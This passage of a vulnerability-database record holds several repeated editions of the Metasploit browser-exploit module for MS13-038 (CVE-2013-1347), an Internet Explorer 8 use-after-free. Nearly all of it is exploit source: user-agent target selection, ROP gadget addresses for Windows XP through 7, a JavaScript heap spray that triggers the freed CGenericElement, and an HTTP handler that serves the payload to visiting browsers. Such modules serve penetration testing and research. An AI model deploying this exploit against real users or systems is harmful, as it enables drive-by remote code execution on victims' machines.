Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-23T11:50:32", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-23T13:50:48", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-03-23T13:50:48"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-23T13:50:48", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-03T12:06:03", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-04-03T12:06:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-03T12:06:03", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-04T14:16:18", "history": [], "viewCount": 69, "enchantments": {"score": {"value": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P/", "modified": "2018-04-04T14:16:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def 